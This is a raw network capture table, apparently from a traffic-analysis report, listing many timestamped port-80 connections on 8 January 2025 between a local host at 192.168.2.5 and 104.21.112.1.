                                                                                                          Jan 8, 2025 17:13:41.816750050 CET5003880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:41.899749994 CET5003880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:41.900907993 CET5003980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:41.904886007 CET8050038104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:41.904951096 CET5003880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:41.905765057 CET8050039104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:41.905957937 CET5003980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:41.906088114 CET5003980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:41.910814047 CET8050039104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:42.254654884 CET5003980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:42.259700060 CET8050039104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:42.259713888 CET8050039104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:42.259721041 CET8050039104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:42.355143070 CET8050039104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:42.535536051 CET5003980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:42.676043987 CET8050039104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:42.738658905 CET5003980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:42.800853014 CET5003980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:42.802411079 CET5004080192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:42.805964947 CET8050039104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:42.806030035 CET5003980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:42.807193995 CET8050040104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:42.807286024 CET5004080192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:42.807399035 CET5004080192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:42.812217951 CET8050040104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:43.161109924 CET5004080192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:43.166187048 CET8050040104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:43.166199923 CET8050040104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:43.166208982 CET8050040104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:43.281111956 CET8050040104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:43.326138020 CET5004080192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:43.441318989 CET8050040104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:43.519862890 CET5004080192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:43.574134111 CET5004080192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:43.575088024 CET5004180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:43.579111099 CET8050040104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:43.579165936 CET5004080192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:43.579941034 CET8050041104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:43.580007076 CET5004180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:43.580101967 CET5004180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:43.584908009 CET8050041104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:43.896239042 CET5004180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:43.896898985 CET5004280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:43.901752949 CET8050042104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:43.901828051 CET5004280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:43.901947975 CET5004280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:43.906666040 CET8050042104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:43.942493916 CET8050041104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:43.958636045 CET8050041104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:43.958690882 CET5004180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:44.057739019 CET5004380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:44.062670946 CET8050043104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:44.062741041 CET5004380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:44.062858105 CET5004380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:44.067604065 CET8050043104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:44.254393101 CET5004280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:44.259295940 CET8050042104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:44.259390116 CET8050042104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:44.410681009 CET5004380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:44.415586948 CET8050043104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:44.415592909 CET8050043104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:44.415596962 CET8050043104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:44.579574108 CET8050042104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:44.671133041 CET8050043104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:44.707489014 CET5004280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:44.738704920 CET5004380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:44.806180000 CET8050042104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:44.914907932 CET8050043104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:45.019912004 CET5004280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:45.059792042 CET5004280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:45.059793949 CET5004380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:45.062104940 CET5004480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:45.064889908 CET8050042104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:45.065016985 CET5004280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:45.065303087 CET8050043104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:45.065366030 CET5004380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:45.067014933 CET8050044104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:45.067111969 CET5004480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:45.070105076 CET5004480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:45.074907064 CET8050044104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:45.427131891 CET5004480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:45.431960106 CET8050044104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:45.432013035 CET8050044104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:45.432022095 CET8050044104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:45.546869993 CET8050044104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:45.713829041 CET5004480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:45.783973932 CET8050044104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:45.832410097 CET5004480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:46.194226027 CET5004580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:46.199081898 CET8050045104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:46.199150085 CET5004580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:46.199260950 CET5004580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:46.204052925 CET8050045104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:46.551325083 CET5004580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:46.556318998 CET8050045104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:46.556333065 CET8050045104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:46.556340933 CET8050045104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:46.685350895 CET8050045104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:46.816765070 CET5004580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:46.851871967 CET8050045104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:46.981616974 CET5004580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:46.982727051 CET5004680192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:46.986587048 CET8050045104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:46.986645937 CET5004580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:46.987514973 CET8050046104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:46.987736940 CET5004680192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:46.987838030 CET5004680192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:46.992614985 CET8050046104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:47.332536936 CET5004680192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:47.337413073 CET8050046104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:47.337450027 CET8050046104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:47.337460995 CET8050046104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:47.653321028 CET8050046104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:47.653419018 CET8050046104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:47.653460026 CET5004680192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:47.774323940 CET5004480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:47.782787085 CET5004680192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:47.783607006 CET5004780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:47.787769079 CET8050046104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:47.787827015 CET5004680192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:47.788378000 CET8050047104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:47.788444996 CET5004780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:47.788569927 CET5004780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:47.793328047 CET8050047104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:48.146728992 CET5004780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:48.151556015 CET8050047104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:48.151566982 CET8050047104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:48.151576996 CET8050047104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:48.231604099 CET8050047104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:48.316767931 CET5004780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:48.475284100 CET8050047104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:48.522120953 CET5004780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:49.068109035 CET5004780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:49.070118904 CET5004880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:49.073060036 CET8050047104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:49.073348999 CET5004780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:49.074935913 CET8050048104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:49.078193903 CET5004880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:49.078306913 CET5004880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:49.083122969 CET8050048104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:49.426655054 CET5004880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:49.431641102 CET8050048104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:49.431654930 CET8050048104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:49.431665897 CET8050048104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:49.560324907 CET8050048104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:49.737653971 CET5004880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:49.787061930 CET8050048104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:49.818681002 CET5004980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:49.823601007 CET8050049104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:49.823663950 CET5004980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:49.823780060 CET5004980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:49.828614950 CET8050049104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:49.931149960 CET5004880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:49.977467060 CET5005080192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:49.982367992 CET8050050104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:49.982436895 CET5005080192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:49.982583046 CET5005080192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:49.987370014 CET8050050104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:50.176285982 CET5004980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:50.181269884 CET8050049104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:50.181289911 CET8050049104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:50.282531977 CET8050049104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:50.332700014 CET5005080192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:50.337871075 CET8050050104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:50.337881088 CET8050050104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:50.337892056 CET8050050104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:50.441564083 CET8050050104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:50.502681017 CET8050049104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:50.502758980 CET5004980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:50.526631117 CET8050049104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:50.629290104 CET5005080192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:50.677186966 CET8050050104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:50.707393885 CET5004980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:50.741529942 CET5005080192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:50.822021961 CET5004980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:50.822024107 CET5004880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:50.822293997 CET5005080192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:50.826113939 CET5005180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:50.826988935 CET8050049104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:50.827320099 CET5004980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:50.827373028 CET8050048104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:50.827379942 CET8050050104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:50.827737093 CET5004880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:50.827737093 CET5005080192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:50.831214905 CET8050051104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:50.831305981 CET5005180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:50.831573963 CET5005180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:50.836414099 CET8050051104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:51.178128004 CET5005180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:51.183067083 CET8050051104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:51.183074951 CET8050051104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:51.183084965 CET8050051104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:51.278647900 CET8050051104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:51.410526037 CET5005180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:51.517340899 CET8050051104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:51.707384109 CET5005180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:51.747390032 CET5005180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:51.748653889 CET5005280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:51.753441095 CET8050052104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:51.753515005 CET5005280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:51.753628016 CET5005280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:51.758435965 CET8050052104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:51.762995958 CET8050051104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:51.763048887 CET5005180192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:52.098242044 CET5005280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:52.103203058 CET8050052104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:52.103215933 CET8050052104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:52.103224039 CET8050052104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:52.210783005 CET8050052104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:52.316886902 CET5005280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:52.446707010 CET8050052104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:52.519892931 CET5005280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:52.569474936 CET5005280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:52.569955111 CET5005380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:52.576064110 CET8050052104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:52.576148987 CET5005280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:52.576226950 CET8050053104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:52.577358007 CET5005380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:52.577358007 CET5005380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:52.582109928 CET8050053104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:52.930128098 CET5005380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:52.935133934 CET8050053104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:52.935142040 CET8050053104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:52.935147047 CET8050053104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:53.029378891 CET8050053104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:53.194094896 CET8050053104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:53.194446087 CET5005380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:53.315947056 CET5005380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:53.316966057 CET5005480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:53.321034908 CET8050053104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:53.321116924 CET5005380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:53.321769953 CET8050054104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:53.324460030 CET5005480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:53.324536085 CET5005480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:53.329351902 CET8050054104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:53.676292896 CET5005480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:53.681186914 CET8050054104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:53.681199074 CET8050054104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:53.681206942 CET8050054104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:53.796535015 CET8050054104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:54.014488935 CET8050054104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:54.014543056 CET5005480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:54.032279968 CET8050054104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:54.124728918 CET8050054104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:54.124792099 CET5005480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:54.534873009 CET5005480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:54.536175013 CET5005580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:54.539972067 CET8050054104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:54.540043116 CET5005480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:54.541032076 CET8050055104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:54.541136026 CET5005580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:54.541273117 CET5005580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:54.546228886 CET8050055104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:54.894998074 CET5005580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:54.900091887 CET8050055104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:54.900110006 CET8050055104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:54.900120974 CET8050055104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:54.994374990 CET8050055104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:55.035521984 CET5005580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:55.238485098 CET8050055104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:55.332393885 CET5005580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:55.367002010 CET5005580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:55.367752075 CET5005680192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:55.372133970 CET8050055104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:55.372245073 CET5005580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:55.372541904 CET8050056104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:55.372631073 CET5005680192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:55.372756958 CET5005680192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:55.377511024 CET8050056104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:55.536842108 CET5005680192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:55.538008928 CET5005780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:55.542845011 CET8050057104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:55.542941093 CET5005780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:55.543040037 CET5005780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:55.547853947 CET8050057104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:55.582458973 CET8050056104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:55.663845062 CET5005880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:55.668863058 CET8050058104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:55.668957949 CET5005880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:55.669076920 CET5005880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:55.673830032 CET8050058104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:55.763762951 CET8050056104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:55.763890028 CET5005680192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:55.895045042 CET5005780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:55.899955034 CET8050057104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:55.900119066 CET8050057104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:55.989758015 CET8050057104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:56.019989014 CET5005880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:56.024959087 CET8050058104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:56.024971962 CET8050058104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:56.024986982 CET8050058104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:56.035547972 CET5005780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:56.140156984 CET8050058104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:56.207421064 CET5005880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:56.241077900 CET8050057104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:56.332420111 CET5005780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:56.412748098 CET8050058104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:56.504388094 CET8050058104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:56.506161928 CET5005880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:57.270906925 CET5005780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:57.271068096 CET5005880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:57.274390936 CET5005980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:57.275985003 CET8050057104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:57.276037931 CET5005780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:57.276431084 CET8050058104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:57.276473999 CET5005880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:57.279177904 CET8050059104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:57.279257059 CET5005980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:57.279416084 CET5005980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:57.284192085 CET8050059104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:57.629504919 CET5005980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:57.634506941 CET8050059104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:57.634521961 CET8050059104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:57.634550095 CET8050059104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:57.733865976 CET8050059104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:57.926176071 CET5005980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:58.000607967 CET8050059104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:13:58.138324976 CET5005980192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:13:58.143435001 CET8050059104.21.112.1192.168.2.5
